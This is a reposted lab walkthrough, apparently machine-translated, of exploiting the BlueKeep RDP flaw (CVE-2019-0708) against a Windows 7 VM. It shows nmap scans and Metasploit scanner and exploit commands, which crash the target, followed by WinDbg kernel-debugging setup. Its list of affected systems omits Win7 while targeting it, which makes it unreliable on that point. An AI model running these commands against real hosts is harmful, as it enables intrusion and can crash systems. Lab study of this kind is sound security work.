Domain Exploitation 03 - Vulnerability (CVE-2019-0708)

Language 2023-06-24 20:52:21 views: null

Vulnerability profile:

        CVE-2019-0708 can only target the following versions of the system, and there is no vulnerability in the system after win7:

        Windows Server 2008 R2 、 Windows Server 2008 、Windows 2003 、 Windows XP。

        The vulnerability is attacked through the RDP protocol, which requires the host we are attacking to open the remote desktop, which is generally port 3389, which belongs to the UAF heap overflow vulnerability. The vulnerability exists in termdd.sys, because the attack is the kernel, so when attacking, if Wrong choice of configuration can easily lead to blue screen, so it must be operated with caution in actual combat.

Vulnerability reproduction:

Target machine environment:

        win7:192.168.1.10

        vmware:17

        kali:192.168.1.5

First use nmap to scan the win7 target machine under kali, first scan the open port, if the protocol is not scanned, you can perform a full protocol scan according to the result, which can better identify the protocol corresponding to the port, and add -O to identify the system

nmap -p- --min-rate 2000 -sT 192.168.1.10
nmap -p 3389 --version-all -O 192.168.1.10

You can see the 3389 protocol rdp(ms-wbt-server), which can be tested. Because in the virtual machine, nmap recognition is not very accurate.

 Test for the existence of vulnerabilities:

        After finding the target machine and opening port 3389 to the outside world, we must first test whether the vulnerability exists, and then consider whether to carry out the next attack:

msfconsole
reload_all
search 0708

 You can see that there are two, the first poc and the second exp.

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep  
set rhosts 192.168.1.10
show options

 Vulnerabilities can be seen

use:

        Next, use the exploit found in msf to try to attack

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.10
set target 1
set forceexploit true
show options

        Among them, use show target to view the attack platform. When the attack finds a blue screen, you can check here to find the same host as your own attack system.

        ​​​​You can view the configuration information

        Execution vulnerability 

        After execution, I found a blue screen and did not return to the shell, which is very embarrassing. This must be a problem with the address of the vulnerability. Debug it to see:

         

Summarize:

        Because this vulnerability is an attack against the kernel, the address of different system versions will be different, so it is easy to cause a blue screen when exploited. This is still very dangerous in a real penetration test. After all, the impact of a blue screen is still a bit big. So this can be used as research. If you really want to try to attack, it is best to try it with the corresponding system version.

Off-topic debugging test:

 Install windbg:

First install windbag, download address:

x64
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools_amd64/dbg_amd64.msi
x86
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools/dbg_x86.msi

Install and add dual-machine debugging:

  1. Select [Edit Virtual Machine Settings], remove [Printers]
  2. Add [Serial Port], select [Use Named Pipes] in the configuration, enter \\.\pipe\com_1, the first select [This end is the server], and the other select [The other end is the application]. Check [Proactively give up CPU when polling], click [OK]
  3. Start Windows 7, run the command line as an administrator, enter bcdedit /dbgsettings serial baudrate:115200 debugport:1 to set port com_1, baudrate to 115200.
  4. Type bcdedit /displayorder {current} {e8a0ccf0-9748-11eb-950a-ce6045b926ac} to add a new option to the boot menu. (Note: {e8a0ccf0-9748-11eb-950a-ce6045b926ac} here needs to enter the ID number you generated in the previous step)
  5. Type bcdedit /debug {e8a0ccf0-9748-11eb-950a-ce6045b926ac} ON to activate debug. (the ID here is the same as above)
  6. Send WinDbg to the desktop shortcut, right-click the shortcut on the desktop, click [Properties], and add -b -k com:pipe,port=\\.\pipe\com_1,resets=0 to the target (note: if The previous content has double quotation marks, and the additional content should be placed after the double quotation marks)
  7. Set a system variable named _NT_SYMBOL_PATH, the variable value is set to srv*d:\ctftools\symbols*http://msdl.microsoft.com/download/symbols, where *d:\ctftools\symbols* is the cache symbol table position, you can change it yourself.
  8. Restart Windows 7 OS, select [DebugEntry] when booting, and open WinDbg at the same time.

 debugging:

        

Guess you like

Origin blog.csdn.net/GalaxySpaceX/article/details/130449689
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com